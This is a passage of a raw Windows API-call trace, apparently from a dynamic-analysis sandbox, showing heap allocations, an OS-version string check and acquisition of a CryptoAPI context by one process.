RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x2416270 [0190.030] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0190.030] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0190.030] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0190.030] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0190.030] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa700 [0190.030] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0190.030] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0190.030] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa968 [0190.030] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0190.030] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0190.030] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0190.030] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0190.030] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0190.030] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0190.030] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0190.030] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0190.030] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0190.030] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0190.030] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0190.030] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0190.031] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0190.031] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0190.031] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0190.031] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0190.031] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0190.031] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_7", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0190.031] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0190.031] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0190.031] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0190.031] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0190.031] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0190.031] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0190.031] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0190.031] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0190.031] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0190.031] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0190.031] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0190.031] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0190.031] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b20 [0190.031] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0190.031] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0190.032] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b20 | out: hHeap=0x25c0000) returned 1 [0190.032] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0190.032] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa950 [0190.032] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0190.032] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0190.032] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0190.032] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0190.032] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0190.032] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0190.032] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0190.032] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0190.032] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0190.032] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0190.032] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b20 [0190.032] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0190.032] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b20 | out: hHeap=0x25c0000) returned 1 [0190.032] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0190.032] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0190.032] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0190.032] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0190.032] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0190.032] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0190.033] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0190.033] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0190.033] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0190.033] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0190.033] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0190.033] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0190.033] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0190.033] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0190.033] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0190.033] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0190.033] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0190.033] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0190.033] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0190.033] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0190.033] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0190.033] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0190.033] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0190.033] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0190.033] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0190.033] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0190.033] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0190.034] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0190.034] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0190.034] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0190.034] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0190.034] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0190.034] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0190.034] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0190.034] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0190.034] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0190.034] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0190.034] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b20 [0190.034] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0190.034] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0190.034] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0190.034] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0190.034] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0190.034] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0190.034] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0190.034] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0190.034] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0190.034] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0190.035] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0190.035] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0190.035] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0190.035] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0190.035] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0190.035] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0190.035] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0190.035] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0190.035] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0190.035] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0190.035] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0190.035] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0190.035] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0190.035] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0190.035] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0190.035] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0190.035] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0190.035] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0190.035] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0190.035] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0190.035] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0190.036] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0190.036] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b20 | out: hHeap=0x25c0000) returned 1 [0190.036] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0190.036] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0190.036] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0190.036] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0190.036] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0190.036] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0190.036] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0190.036] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0190.036] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0190.036] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0190.036] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0190.036] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0190.036] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0190.036] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0190.036] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0190.037] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0190.037] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0190.037] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0190.037] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0190.037] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0190.037] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0190.037] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0190.037] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0190.037] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0190.037] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0190.037] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0190.037] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0190.037] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0190.037] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0190.037] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0190.037] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0190.037] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0190.037] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0190.037] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0190.038] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0190.038] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0190.038] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0190.038] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0190.038] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0190.038] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0190.038] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2466db0, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0190.038] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0190.038] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0190.038] GetProcAddress (hModule=0x74d40000, lpProcName="CryptAcquireContext") returned 0x0 [0190.038] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0190.038] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0190.038] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0190.038] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2466db0, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0190.038] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0190.039] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0190.039] GetProcAddress (hModule=0x74d40000, lpProcName="CryptAcquireContextA") returned 0x74d491dd [0190.039] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0190.039] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0190.039] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b36f8 | out: hHeap=0x25c0000) returned 1 [0190.039] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0190.039] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0190.039] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0190.039] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0190.039] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0190.039] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0190.039] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0190.039] CryptAcquireContextA (in: phProv=0x8befe0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8befe0*=0xaa3868) returned 1 [0190.041] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0190.041] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0190.041] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0190.042] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0190.042] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0190.042] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0190.042] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0190.042] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0190.042] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0190.042] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0190.042] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0190.042] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0190.042] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0190.042] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0190.042] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0190.042] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0190.042] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0190.042] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0190.042] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0190.042] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0190.042] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0190.042] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0190.043] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0190.043] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b20 | out: hHeap=0x25c0000) returned 1 [0190.043] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0190.043] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0190.043] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0190.043] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0190.043] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0190.043] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0190.043] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0190.043] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0190.043] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0190.043] RtlAllocateHeap 